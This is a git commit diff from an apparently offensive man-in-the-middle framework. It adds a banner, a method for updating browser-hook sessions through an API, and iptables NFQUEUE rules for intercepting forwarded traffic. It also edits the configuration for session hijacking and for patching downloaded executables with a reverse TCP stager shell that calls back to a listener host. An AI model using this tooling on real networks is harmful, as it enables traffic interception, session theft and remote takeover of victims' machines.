Fixed IPtables for APF Mode

Added a new banner
This commit is contained in:
byt3bl33d3r 2015-09-14 20:25:06 +02:00
parent 16b774248d
commit 589e45b64f
5 changed files with 26 additions and 7 deletions

View file

@ -79,7 +79,7 @@
[Replace]
[[Regex1]]
'Google Search' = 'Google yssas'
'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -89,7 +89,7 @@
# Here you can specify the client to hijack sessions from
#
Client = '192.168.1.26'
Client = '10.0.237.91'
[SSLstrip+]
@ -445,10 +445,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
HOST = 192.168.1.16
HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_inline_threaded
SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True

View file

@ -65,6 +65,19 @@ banner4 = """
"""
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner():
banners = [banner1, banner2, banner3, banner4]
banners = [banner1, banner2, banner3, banner4, banner5]
return random.choice(banners)

View file

@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log))
return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)

View file

@ -17,7 +17,7 @@ class PacketFilter:
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()

View file

@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1')
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True